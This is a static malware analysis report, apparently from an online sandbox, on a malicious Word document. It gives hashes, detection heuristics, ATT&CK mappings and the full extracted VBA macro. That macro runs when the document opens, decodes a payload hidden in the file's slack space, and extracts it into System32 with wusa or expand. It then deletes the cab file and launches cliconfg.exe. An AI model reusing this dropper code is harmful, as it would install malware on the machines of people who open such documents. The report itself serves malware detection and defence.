Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42a782d342fb7016…

MALICIOUS

Office (OLE)

330.5 KB Created: 2018-01-17 19:39:00 Authoring application: Microsoft Office Word First seen: 2019-10-01
MD5: 9b93066b085a7929aabbab8ccfd331be SHA-1: 9b7c3c48bcef6330e3086de592b3223eb198744a SHA-256: 42a782d342fb70169b07a5c2be054af49f88ffa92d04243b070b5b939eaa4465
490 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes WScript.Shell and cmd.exe. This strongly suggests the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload. The 'Password-protected archive handoff' heuristic indicates the document's content is a lure to obtain a password, a common tactic for malware droppers to evade initial analysis.

Heuristics 13

  • ClamAV: Doc.Dropper.Agent-6423178-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6423178-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            If System.Version >= "6.0" Then
            nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        Else
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set oWscriptShell = CreateObject("WScript.Shell")
    sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set oWscriptShell = CreateObject("WScript.Shell")
    sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        proc_query = "SELECT * FROM Win32_Processor"
    Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
    For Each info In proc_results
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
            If System.Version >= "6.0" Then
            nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        Else
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
Private Sub Document_Open()
    With ActiveDocument.Content
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 338,382 bytes but its declared streams total only 93,887 bytes — 244,495 bytes (72%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3638 bytes
SHA-256: e5f69adbd348644e3e79cad8e97e18433b12dda75341a9773be4053e810171a8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim nResult As Long
Dim sFileName As String
Dim sTempPath As String
Dim sTempFile As String
Dim cbFileBuffer As Long
Private Function debase64(InputFile As String, nOffset As Long, nCount As Long, OutputFile As String) As Long
    Dim strKey As String
    Dim lpInBuffer
    Dim lpOutBuffer() As Byte
    Dim chr1, chr2, chr3, enc1, enc2, enc3, enc4 As Byte
    Dim nIndex, nResult As Long
    
    strKey = "KXU/yP=B29tLzidqNRuf-SbVInw0oCrmWZk6OpFc7A5GTD1QxaJ3H8h4jMeEsYglv"
    
    Open InputFile For Binary As #1
        Seek #1, nOffset + 1
        lpInBuffer = Input(nCount, #1)
    Close #1
    
    ReDim lpOutBuffer(nCount) As Byte
    
    nIndex = 1
    nResult = 0
    
    Do While nIndex <= nCount
        enc1 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc2 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc3 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc4 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        chr1 = (enc1 * 4) Or (enc2 \ 16)
        chr2 = ((enc2 And 15) * 16) Or (enc3 \ 4)
        chr3 = ((enc3 And 3) * 64) Or enc4
        
        lpOutBuffer(nResult) = chr1
        nResult = nResult + 1
        
        If enc3 <> 64 Then
            lpOutBuffer(nResult) = chr2
            nResult = nResult + 1
        End If
        
        If enc4 <> 64 Then
            lpOutBuffer(nResult) = chr3
            nResult = nResult + 1
        End If
    Loop
    
    ReDim Preserve lpOutBuffer(nResult - 1) As Byte
    
    Open OutputFile For Binary As #2
    Put #2, , lpOutBuffer
    Close #2
    
    debase64 = nResult
End Function

Private Function IsWin64() As Boolean
    Dim proc_query As String
    Dim proc_results As Object
    Dim info As Object
    Dim IsWin32OrWin64 As String
    
    proc_query = "SELECT * FROM Win32_Processor"
    Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
    For Each info In proc_results
        IsWin32OrWin64 = "Win" & info.AddressWidth
    Next info
    
    If IsWin32OrWin64 = "Win32" Then
        IsWin64 = False
    Else
        IsWin64 = True
    End If
End Function
Private Sub Document_Open()
    With ActiveDocument.Content
        .Font.ColorIndex = wdBlack
        '.Paragraphs(4).Range.Font.ColorIndex = wdRed
    End With

    Set oWscriptShell = CreateObject("WScript.Shell")
    sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
        
    sFileName = ActiveDocument.FullName
    cbFileBuffer = FileLen(sFileName)
    
    If (cbFileBuffer = 338382) Then
        sTempFile = sTempPath & "\setup.cab"
        
        nResult = InStr(Application.Path, "x86")

    nResult = debase64(sFileName, 99840, 238542, sTempFile)
                
        If System.Version >= "6.0" Then
            nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        Else
            nResult = Shell("cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        End If
    End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.